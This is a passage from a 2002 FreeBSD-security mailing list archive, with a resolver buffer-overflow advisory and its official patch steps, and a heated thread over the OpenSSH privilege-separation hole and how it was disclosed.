ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:28/resolv.patch # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:28/resolv.patch.asc b) Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile the operating systems as described in . Note that any statically linked applications that are not part of the base system (i.e. from the Ports Collection or other 3rd-party sources) must be recompiled. VI. Correction details The following list contains the revision numbers of each file that was corrected in FreeBSD. Path Revision Branch - ------------------------------------------------------------------------- src/lib/libc/net/gethostbydns.c RELENG_4 1.27.2.2 RELENG_4_6 1.27.10.1 RELENG_4_5 1.27.8.1 src/lib/libc/net/getnetbydns.c RELENG_4 1.13.2.2 RELENG_4_6 1.13.2.1.8.1 RELENG_4_5 1.13.2.1.6.1 src/lib/libc/net/name6.c RELENG_4 1.6.2.6 RELENG_4_6 1.6.2.5.8.1 RELENG_4_5 1.6.2.5.6.1 src/sys/conf/newvers.sh RELENG_4_6 1.44.2.23.2.2 RELENG_4_5 1.44.2.20.2.8 - ------------------------------------------------------------------------- VII. References -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iQCVAwUBPRoQOVUuHi5z0oilAQG3cAP/d7Gb2rdkSjZKCR0NI+QzMibgySVTXOtF sdoJrYka/XnIpFMVAyXl36bibtRKbwfCyv/rEX39YSas7tqReizwAABoaRF956Qb qlek1ONvvd+Tj6+WpEEueX/VdPqGQuqMk0BoguIbOgwAya6ZFYJ9ZKAHHSN9YqO8 ZGTC8pmqfGI= =s76v -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 12:15:16 2002 Delivered-To: freebsd-security@freebsd.org Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.86.163]) by hub.freebsd.org (Postfix) with ESMTP id BC13E37BED8 for ; Wed, 26 Jun 2002 12:09:45 -0700 (PDT) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.12.3/8.12.2) with ESMTP id g5QJ7aCn007493; Wed, 26 Jun 2002 21:07:37 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: William Carrel Cc: Jan Lentfer , FreeBSD Security Mailling List Subject: Re: OpenSSH Security (just a question, please no f-war) In-Reply-To: Your message of "Wed, 26 Jun 2002 11:43:45 PDT." Date: Wed, 26 Jun 2002 21:07:36 +0200 Message-ID: <7492.1025118456@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org In message , William Carrel writes : >If and only if you have ChallengeResponseAuthentication set to "yes" then >you are vulnerable to a hole that will allow malicious code to be executed >as the privsep user ("sshd") in the /var/empty chroot(). This could lead to >further compromisation of your system (even inside the chroot as a >relatively unprivileged user). Which reminds me that we should really tweak the code and put it in a jail instead of a chroot. -- Poul-Henning Kamp | UNIX since Zilog Zeus 3.20 phk@FreeBSD.ORG | TCP/IP since RFC 956 FreeBSD committer | BSD since 4.3-tahoe Never attribute to malice what can adequately be explained by incompetence. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 12:15:51 2002 Delivered-To: freebsd-security@freebsd.org Received: from diarmadhi.mushhaven.net (diarmadhi.mushhaven.net [216.150.202.147]) by hub.freebsd.org (Postfix) with SMTP id A39AA37B649 for ; Wed, 26 Jun 2002 12:10:13 -0700 (PDT) Received: (qmail 63257 invoked by uid 1000); 26 Jun 2002 19:07:27 -0000 Date: Wed, 26 Jun 2002 15:07:27 -0400 From: Jamie Norwood To: freebsd-security@freebsd.org Subject: Re: Wow Message-ID: <20020626190727.GA63047@mushhaven.net> References: <200206261741.g5QHf3LI027927@cvs.openbsd.org> <867kklaneg.fsf@blade-runner.mit.edu> <1025118105.443.8.camel@ech.maverik.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <1025118105.443.8.camel@ech.maverik.com> User-Agent: Mutt/1.5.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > > I don't use Microsoft products because I don't want Bill > > Gates assessing my risks and making my decisions for me. > > > > I'll be rethinking my use of OpenSSH for the very same > > reason. You're not my dad, my cop, my priest, my lawyer > > or firefighter. NOR are you the Unix version of 'install > > wizard'. I expect code from you. That's it. Write code. > > > > I don't expect paternalism, risk assesments, restrictions, > > regulations or even the time of day. I have no concern > > for what you think my risks are NOR your preferred method > > of ameliorating those risks. Write the fucking code. I ask > > for no warrantee. I don't call you with help desk questions. > > Write the code and get down off that extremely high horse > > before you hurt yourself. > > > > Petr Swedock No offense, Petr, but you don't have a right to .expect. anything, for this software that is free. I think you should, indeed, take your own advice, and use a different product. Preferably, the most expensive one you can find. And you will STILL have them make decision without consulting you. Or else, 'Use the fucking code and get off that extremely high horse before you hurt yourself'. Jamie To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 12:58:24 2002 Delivered-To: freebsd-security@freebsd.org Received: from cvs.openbsd.org (cvs.openbsd.org [199.185.137.3]) by hub.freebsd.org (Postfix) with ESMTP id 2425A37C136 for ; Wed, 26 Jun 2002 12:20:10 -0700 (PDT) Received: from cvs.openbsd.org (deraadt@localhost [127.0.0.1]) by cvs.openbsd.org (8.12.4/8.12.1) with ESMTP id g5QJJLLI018466; Wed, 26 Jun 2002 13:19:21 -0600 (MDT) Message-Id: <200206261919.g5QJJLLI018466@cvs.openbsd.org> To: Benjamin Krueger Cc: Travis Cole , freebsd-security@freebsd.org Subject: Re: Wow In-reply-to: Your message of "Wed, 26 Jun 2002 12:17:54 PDT." <20020626121754.F8071@mail.seattleFenix.net> Date: Wed, 26 Jun 2002 13:19:21 -0600 From: Theo de Raadt Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > * Theo de Raadt (deraadt@cvs.openbsd.org) [020626 12:02]: > > > On Wed, Jun 26, 2002 at 11:41:03AM -0600, Theo de Raadt wrote: > > > > Man, you guys sure do talk shit a lot. But anyways, that is hardly > > > > surprising or news. > > > > > > > > I do have a question though. > > > > > > > > Did any of you get broken in via this hole yet? > > > > > > Nope. Just wasted a good part of yesterday upgrading 60 boxes > > > from a non-vulnerable version of OpenSSH to a version with a now > > > known remote exploit. > > > > > > I think the PR for this issue could have been a bit better... > > > > We also did 5600 lines of further security auditing work over the last > > week. We're fairly convinced that some of the things we changed are > > relevant as well. ie. more holes. > > > > And that is commited in 3.4 > > Theo, > > When will we see an advisory and/or patches for older versions regarding > the other holes that you have uncovered? You won't. I've barely slept in a week. So many of you are being totally unreasonable people. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 13: 2:54 2002 Delivered-To: freebsd-security@freebsd.org Received: from bunning.skiltech.com (bunning.skiltech.com [216.235.79.240]) by hub.freebsd.org (Postfix) with ESMTP id 07E5F37C3E3 for ; Wed, 26 Jun 2002 12:27:41 -0700 (PDT) Received: (from root@localhost) by bunning.skiltech.com (8.11.6/8.11.6) id g5QJQbN47356 for freebsd-security@freebsd.org; Wed, 26 Jun 2002 15:26:37 -0400 (EDT) (envelope-from minter) Received: (from minter@localhost) by bunning.skiltech.com (8.11.6/8.11.6) id g5QJQYs47343; Wed, 26 Jun 2002 15:26:34 -0400 (EDT) (envelope-from minter) Date: Wed, 26 Jun 2002 15:26:34 -0400 (EDT) From: "H. Wade Minter" X-X-Sender: minter@bunning.skiltech.com To: freebsd-security@freebsd.org Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv In-Reply-To: <200206261908.g5QJ8MOE035394@freefall.freebsd.org> Message-ID: <20020626152504.Q45972-100000@bunning.skiltech.com> X-Folkin-Excellent: Eddie From Ohio (efohio.com) MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Virus-Scanned: by AMaViS perl-11 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, 26 Jun 2002, FreeBSD Security Advisories wrote: > ============================================================================= > FreeBSD-SA-02:28.resolv Security Advisory > The FreeBSD Project > > Topic: buffer overflow in resolver > > Category: core > Module: libc [snip] > Do one of the following: > > 1) Upgrade your vulnerable system to 4.6-STABLE; or to the RELENG_4_6 > or RELENG_4_5 security branch dated after the correction date > (4.6-RELEASE-p1 or 4.5-RELEASE-p7). > > 2) To patch your present system: > > The following patch has been verified to apply to FreeBSD 4.5 and > FreeBSD 4.6 systems. > > a) Download the relevant patch from the location below, and verify the > detached PGP signature using your PGP utility. > > # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:28/resolv.patch > # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:28/resolv.patch.asc > > b) Execute the following commands as root: > > # cd /usr/src > # patch < /path/to/patch So am I correct in assuming that this fix requires a complete system rebuild (make buildworld) as opposed to just rebuilding a particular module? --Wade -- 'I say to you that the VCR is to the American film producer and the American public as the Boston strangler is to the woman home alone.' Jack Valenti on VCRs, 1982 'It's getting clear -- alarmingly clear, I might add -- that we are in the midst of the possibility of Armageddon.' Jack Valenti on the Internet, 2002 http://www.digitalconsumer.org/ http://digitalspeech.org/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 13:12:24 2002 Delivered-To: freebsd-security@freebsd.org Received: from blade-runner.mit.edu (BLADE-RUNNER.MIT.EDU [18.78.0.22]) by hub.freebsd.org (Postfix) with ESMTP id D255437C44A for ; Wed, 26 Jun 2002 12:28:43 -0700 (PDT) Received: (from petr@localhost) by blade-runner.mit.edu (8.11.6/8.11.6) id g5QJSWW47241; Wed, 26 Jun 2002 15:28:32 -0400 (EDT) (envelope-from petr) To: tstevenson@mavericck.com Cc: freebsd-security@freebsd.org Subject: Re: Wow References: <200206261741.g5QHf3LI027927@cvs.openbsd.org> <867kklaneg.fsf@blade-runner.mit.edu> <1025118105.443.8.camel@ech.maverik.com> <864rfpalnc.fsf@blade-runner.mit.edu> From: Petr Swedock Date: 26 Jun 2002 15:28:32 -0400 In-Reply-To: Petr Swedock's message of 26 Jun 2002 15:24:23 -0400 Message-ID: <863cv9algf.fsf@blade-runner.mit.edu> Lines: 30 X-Mailer: Gnus v5.3/Emacs 19.34 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Travis Stevenson writes: > > Wow, slow down a little. He just wanted to know if this has affected > anyone. Um, no. He asked if anyone was rooted. That's a little different from the more general 'affected.' Have I been affected? Yes. I spent lots of time (and even some lost sleep) trying to get a handle on the risk. Most of a work day trying to track down and collate info to see if I was in the crosshairs. That's a day I could have spent doing something more productive. So I'd say I was affected. That wasn't his question, tho', was it? > And if you had > anything to say to him it should have been sent to him and not to all of > us. Perhaps so. Perhaps not. If you're concerned that this is 'off-topic' let me assure you that, while not technical, this is most certainly topical to this list: it is a *security list*, not a 'jump-when-Theo -says-jump-list'. And that's what I'm saying. If you don't think that's topical to this list... Petr Swedock To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 13:19:40 2002 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [63.229.157.2]) by hub.freebsd.org (Postfix) with ESMTP id 81D0837C106 for ; Wed, 26 Jun 2002 13:10:14 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id NAA14201 for ; Wed, 26 Jun 2002 13:33:54 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020626133115.022a0d30@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Wed, 26 Jun 2002 13:33:34 -0600 To: security@FreeBSD.ORG From: Brett Glass Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv In-Reply-To: <200206261908.g5QJ8MOE035394@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Aaargh. This will affect not only more recent systems but the older 3.x and embedded systems I maintain for people. There's no patch for these, and in the case of the embedded systems that use BSD I can't upgrade. Any word on whether one can detect and block such attacks upstream via an IDS or a proxy at the firewall? --Brett Glass At 01:08 PM 6/26/2002, FreeBSD Security Advisories wrote: >-----BEGIN PGP SIGNED MESSAGE----- > >============================================================================= >FreeBSD-SA-02:28.resolv Security Advisory > The FreeBSD Project > >Topic: buffer overflow in resolver > >Category: core >Module: libc >Announced: 2002-06-26 >Credits: Joost Pol >Affects: All releases prior to and including 4.6-RELEASE >Corrected: 2002-06-26 06:34:18 UTC (RELENG_4) > 2002-06-26 08:44:24 UTC (RELENG_4_6) > 2002-06-26 18:53:20 UTC (RELENG_4_5) >FreeBSD only: NO > >I. Background > >The resolver implements functions for making, sending and interpreting >query and reply messages with Internet domain name servers. >Hostnames, IP addresses, and other information are queried using the >resolver. > >II. Problem Description > >DNS messages have specific byte alignment requirements, resulting in >padding in messages. In a few instances in the resolver code, this >padding is not taken into account when computing available buffer >space. As a result, the parsing of a DNS message may result in a >buffer overrun of up to a few bytes for each record included in the >message. > >III. Impact > >An attacker (either a malicious domain name server or an agent that >can spoof DNS messages) may produce a specially crafted DNS message >that will exploit this bug when parsed by an application using the >resolver. It may be possible for such an exploit to result in the >execution of arbitrary code with the privileges of the resolver-using >application. Though no exploits are known to exist today, since >practically all Internet applications utilize the resolver, the >severity of this issue is high. > >IV. Workaround > >There is currently no workaround. > >V. Solution > >Do one of the following: > >1) Upgrade your vulnerable system to 4.6-STABLE; or to the RELENG_4_6 >or RELENG_4_5 security branch dated after the correction date >(4.6-RELEASE-p1 or 4.5-RELEASE-p7). > >2) To patch your present system: > >The following patch has been verified to apply to FreeBSD 4.5 and >FreeBSD 4.6 systems. > >a) Download the relevant patch from the location below, and verify the >detached PGP signature using your PGP utility. > ># fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:28/resolv.patch ># fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:28/resolv.patch.asc > >b) Execute the following commands as root: > ># cd /usr/src ># patch < /path/to/patch > >c) Recompile the operating systems as described in >. > >Note that any statically linked applications that are not part of >the base system (i.e. from the Ports Collection or other 3rd-party >sources) must be recompiled. > >VI. Correction details > >The following list contains the revision numbers of each file that was >corrected in FreeBSD. > >Path Revision > Branch >- ------------------------------------------------------------------------- >src/lib/libc/net/gethostbydns.c > RELENG_4 1.27.2.2 > RELENG_4_6 1.27.10.1 > RELENG_4_5 1.27.8.1 >src/lib/libc/net/getnetbydns.c > RELENG_4 1.13.2.2 > RELENG_4_6 1.13.2.1.8.1 > RELENG_4_5 1.13.2.1.6.1 >src/lib/libc/net/name6.c > RELENG_4 1.6.2.6 > RELENG_4_6 1.6.2.5.8.1 > RELENG_4_5 1.6.2.5.6.1 >src/sys/conf/newvers.sh > RELENG_4_6 1.44.2.23.2.2 > RELENG_4_5 1.44.2.20.2.8 >- ------------------------------------------------------------------------- > >VII. References > > >-----BEGIN PGP SIGNATURE----- >Version: GnuPG v1.0.7 (FreeBSD) > >iQCVAwUBPRoQOVUuHi5z0oilAQG3cAP/d7Gb2rdkSjZKCR0NI+QzMibgySVTXOtF >sdoJrYka/XnIpFMVAyXl36bibtRKbwfCyv/rEX39YSas7tqReizwAABoaRF956Qb >qlek1ONvvd+Tj6+WpEEueX/VdPqGQuqMk0BoguIbOgwAya6ZFYJ9ZKAHHSN9YqO8 >ZGTC8pmqfGI= >=s76v >-----END PGP SIGNATURE----- > >This is the moderated mailing list freebsd-announce. >The list contains announcements of new FreeBSD capabilities, >important events and project milestones. >See also the FreeBSD Web pages at http://www.freebsd.org > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-announce" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 13:21:46 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.seattleFenix.net (sense-sea-MegaSub-1-501.oz.net [216.39.145.247]) by hub.freebsd.org (Postfix) with ESMTP id 6831137BFE6 for ; Wed, 26 Jun 2002 12:16:54 -0700 (PDT) Received: (from roo@localhost) by mail.seattleFenix.net (8.11.6/8.11.6) id g5QJHsO09281; Wed, 26 Jun 2002 12:17:54 -0700 (PDT) (envelope-from roo) Date: Wed, 26 Jun 2002 12:17:54 -0700 From: Benjamin Krueger To: Theo de Raadt Cc: Travis Cole , freebsd-security@freebsd.org Subject: Re: Wow Message-ID: <20020626121754.F8071@mail.seattleFenix.net> References: <20020626185126.GB35484@ainaz.pair.com> <200206261854.g5QIsNLI015235@cvs.openbsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200206261854.g5QIsNLI015235@cvs.openbsd.org>; from deraadt@cvs.openbsd.org on Wed, Jun 26, 2002 at 12:54:23PM -0600 X-PGP-Key: http://www.macguire.net/benjamin/public_key.asc Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org * Theo de Raadt (deraadt@cvs.openbsd.org) [020626 12:02]: > > On Wed, Jun 26, 2002 at 11:41:03AM -0600, Theo de Raadt wrote: > > > Man, you guys sure do talk shit a lot. But anyways, that is hardly > > > surprising or news. > > > > > > I do have a question though. > > > > > > Did any of you get broken in via this hole yet? > > > > Nope. Just wasted a good part of yesterday upgrading 60 boxes > > from a non-vulnerable version of OpenSSH to a version with a now > > known remote exploit. > > > > I think the PR for this issue could have been a bit better... > > We also did 5600 lines of further security auditing work over the last > week. We're fairly convinced that some of the things we changed are > relevant as well. ie. more holes. > > And that is commited in 3.4 Theo, When will we see an advisory and/or patches for older versions regarding the other holes that you have uncovered? Regards, -- Benjamin Krueger "Life is far too important a thing ever to talk seriously about." - Oscar Wilde (1854 - 1900) ---------------------------------------------------------------- Send mail w/ subject 'send public key' or query for (0x251A4B18) Fingerprint = A642 F299 C1C1 C828 F186 A851 CFF0 7711 251A 4B18 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 13:28:50 2002 Delivered-To: freebsd-security@freebsd.org Received: from smtp.netcabo.pt (smtp.netcabo.pt [212.113.174.9]) by hub.freebsd.org (Postfix) with ESMTP id 0680B37BDF2 for ; Wed, 26 Jun 2002 12:10:20 -0700 (PDT) Received: from cheetah ([213.22.31.9]) by smtp.netcabo.pt with Microsoft SMTPSVC(5.0.2195.4905); Wed, 26 Jun 2002 20:08:31 +0100 From: "Bruno Miguel" Organization: Artists, Inc. To: Theo de Raadt Date: Wed, 26 Jun 2002 20:10:11 +0100 MIME-Version: 1.0 Subject: Re: Wow Reply-To: brunomiguel@netcabo.pt Cc: freebsd-security@freebsd.org Message-ID: <3D1A1FA3.9224.13C6413@localhost> In-reply-to: <200206261854.g5QIsNLI015235@cvs.openbsd.org> References: Your message of "Wed, 26 Jun 2002 14:51:27 EDT." <20020626185126.GB35484@ainaz.pair.com> X-mailer: Pegasus Mail for Windows (v4.01) Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Content-description: Mail message body X-OriginalArrivalTime: 26 Jun 2002 19:08:32.0125 (UTC) FILETIME=[DCEC4AD0:01C21D44] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On 26 Jun 2002 at 12:54, Theo de Raadt wrote... > > Nope. Just wasted a good part of yesterday upgrading 60 boxes > > from a non-vulnerable version of OpenSSH to a version with a now > > known remote exploit. > > > > I think the PR for this issue could have been a bit better... [...] > By all means. Please continue running what you have. Don't upgrade > to 3.4. And please turn privsep off. > > Or, please, use someone else's software. > > Please. Making errors is part of the human nature. Though, fewer and fewer can admit their own mistakes. ...:-=>> The freaking Mail Band <<=-:... hununu@netcabo.pt D.E.Q. @ I.S.T. - Portugal To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 13:30:38 2002 Delivered-To: freebsd-security@freebsd.org Received: from omta01.mta.everyone.net (sitemail3.everyone.net [216.200.145.37]) by hub.freebsd.org (Postfix) with ESMTP id 85E0837CC18; Wed, 26 Jun 2002 13:22:34 -0700 (PDT) Received: from sitemail.everyone.net (dsnat [216.200.145.62]) by omta01.mta.everyone.net (Postfix) with ESMTP id 8C2071C3F58; Wed, 26 Jun 2002 12:20:09 -0700 (PDT) Received: by sitemail.everyone.net (Postfix, from userid 99) id 2A8C1274E; Wed, 26 Jun 2002 12:20:09 -0700 (PDT) Content-Type: text/plain Content-Disposition: inline Content-Transfer-Encoding: 7bit Mime-Version: 1.0 X-Mailer: MIME-tools 5.41 (Entity 5.404) Date: Wed, 26 Jun 2002 12:20:05 -0700 (PDT) From: Muhammad Faisal Rauf Danka To: Theo de Raadt Cc: freebsd-security@freebsd.org Subject: Re: Wow Reply-To: mfrd@attitudex.com X-Originating-Ip: [202.5.134.230] Message-Id: <20020626192009.2A8C1274E@sitemail.everyone.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org privsep on privsep off wtf ? makeup your mind. do everyone a favour, let us all keep our openssh off for a few weeks, or we could firewall them, or use telnet for that matter temporarily and even if some of us do run openssh openly then it's their responsibility if they get hacked. AND YOU IN THE MEANWHILE should take some rest and release a version which will probably wont be found vulnerable atleast untill next 2 - 3 months. PLEASE!! Please, instead of wasting time in rants against you on mailing lists, and then replying them and then releasing improper advisories with no technical details and ordering people to just update cause you said so, you better be off focusing more at the code. (no offence) Regards, --------- Muhammad Faisal Rauf Danka Chief Technology Officer Gem Internet Services (Pvt) Ltd. web: www.gem.net.pk Vice President Pakistan Computer Emergency Responce Team (PakCERT) web: www.pakcert.org Chief Security Analyst Applied Technology Research Center (ATRC) web: www.atrc.net.pk --- Theo de Raadt wrote: >> On Wed, Jun 26, 2002 at 11:41:03AM -0600, Theo de Raadt wrote: >> > Man, you guys sure do talk shit a lot. But anyways, that is hardly >> > surprising or news. >> > >> > I do have a question though. >> > >> > Did any of you get broken in via this hole yet? >> >> Nope. Just wasted a good part of yesterday upgrading 60 boxes >> from a non-vulnerable version of OpenSSH to a version with a now >> known remote exploit. >> >> I think the PR for this issue could have been a bit better... > >We also did 5600 lines of further security auditing work over the last >week. We're fairly convinced that some of the things we changed are >relevant as well. ie. more holes. > >And that is commited in 3.4 > >By all means. Please continue running what you have. Don't upgrade >to 3.4. And please turn privsep off. > >Or, please, use someone else's software. > >Please. _____________________________________________________________ --------------------------- [ATTITUDEX.COM] http://www.attitudex.com/ --------------------------- _____________________________________________________________ Promote your group and strengthen ties to your members with email@yourgroup.org by Everyone.net http://www.everyone.net/?btn=tag To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 13:35: 6 2002 Delivered-To: freebsd-security@freebsd.org Received: from blort.org (blort.org [208.8.184.14]) by hub.freebsd.org (Postfix) with ESMTP id 3414A37BFD5 for ; Wed, 26 Jun 2002 12:13:24 -0700 (PDT) Received: by blort.org (Postfix, from userid 1001) id F33E320F31; Wed, 26 Jun 2002 12:13:10 -0700 (PDT) Date: Wed, 26 Jun 2002 12:13:10 -0700 From: Kameron Gasso To: Travis Stevenson Cc: freebsd-security@freebsd.org Subject: Re: Wow Message-ID: <20020626121310.A56208@blort.org> Reply-To: kgasso@blort.org References: <200206261741.g5QHf3LI027927@cvs.openbsd.org> <867kklaneg.fsf@blade-runner.mit.edu> <1025118105.443.8.camel@ech.maverik.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="IJpNTDwzlM2Ie8A6" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <1025118105.443.8.camel@ech.maverik.com>; from tstevenson@maverik.com on Wed, Jun 26, 2002 at 01:01:45PM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --IJpNTDwzlM2Ie8A6 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable * At 12:04PDT on 06/26/2002, Travis Stevenson wrot= e: > Wow, slow down a little. He just wanted to know if this has affected > anyone. >=20 > Just a simply yes or no would have been sufficient. And if you had > anything to say to him it should have been sent to him and not to all of > us. =20 > =20 > Come on. =20 >=20 > --Travis Although Theo's original post - as I see it - was worded in a snide sort of= way, I agree that we DO NOT need another flamewar about this on -security.= Let's stop beating this dead horse, fix what needs to be fixed, and get o= n with our lives. Thanks, --=20 Kameron Gasso PGP key at http://blort.org/~kgasso/pgpkey.txt --IJpNTDwzlM2Ie8A6 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE9GhJDRa4UJDpmZqQRAtomAJ4h2nrNZeDqcLb1koxDR9DB6hpBEQCeOj0S azz0NEC1ujDCDNAvVIVVyW8= =JcTR -----END PGP SIGNATURE----- --IJpNTDwzlM2Ie8A6-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 13:38:53 2002 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id B0F1037CA15 for ; Wed, 26 Jun 2002 13:13:52 -0700 (PDT) Received: from khavrinen.lcs.mit.edu (localhost [IPv6:::1]) by khavrinen.lcs.mit.edu (8.12.3/8.12.3) with ESMTP id g5QKDjDK025154; Wed, 26 Jun 2002 16:13:45 -0400 (EDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.12.3/8.12.3/Submit) id g5QKDjF6025151; Wed, 26 Jun 2002 16:13:45 -0400 (EDT) (envelope-from wollman) Date: Wed, 26 Jun 2002 16:13:45 -0400 (EDT) From: Garrett Wollman Message-Id: <200206262013.g5QKDjF6025151@khavrinen.lcs.mit.edu> To: Poul-Henning Kamp Cc: FreeBSD Security Mailling List Subject: Re: OpenSSH Security (just a question, please no f-war) In-Reply-To: <7492.1025118456@critter.freebsd.dk> References: <7492.1025118456@critter.freebsd.dk> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org < said: > Which reminds me that we should really tweak the code and put it in a > jail instead of a chroot. Something I'd really love to see, and I hope that the TrustedBSD work will eventually make it easier to implement this, is a gensym mechanism for UIDs. That is to say, I'd like a process which is trying to reduce privilege to be able to get a UID which is guaranteed to be distinct from any other UID on the system. The number itself doesn't have to be unique, but the result of calling setuniqueuid() would be to set a flag in the process credentials causing all DAC permission checks to fail. (This could be implemented as a MAC policy that simply says ``no'' to every request from such a process.) -GAWollman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 13:40:34 2002 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id B0F1037CA15 for ; Wed, 26 Jun 2002 13:13:52 -0700 (PDT) Received: from khavrinen.lcs.mit.edu (localhost [IPv6:::1]) by khavrinen.lcs.mit.edu (8.12.3/8.12.3) with ESMTP id g5QKDjDK025154; Wed, 26 Jun 2002 16:13:45 -0400 (EDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.12.3/8.12.3/Submit) id g5QKDjF6025151; Wed, 26 Jun 2002 16:13:45 -0400 (EDT) (envelope-from wollman) Date: Wed, 26 Jun 2002 16:13:45 -0400 (EDT) From: Garrett Wollman Message-Id: <200206262013.g5QKDjF6025151@khavrinen.lcs.mit.edu> To: Poul-Henning Kamp Cc: FreeBSD Security Mailling List Subject: Re: OpenSSH Security (just a question, please no f-war) In-Reply-To: <7492.1025118456@critter.freebsd.dk> References: <7492.1025118456@critter.freebsd.dk> Sender: owner-freebsd-security@FreeBSD.ORG 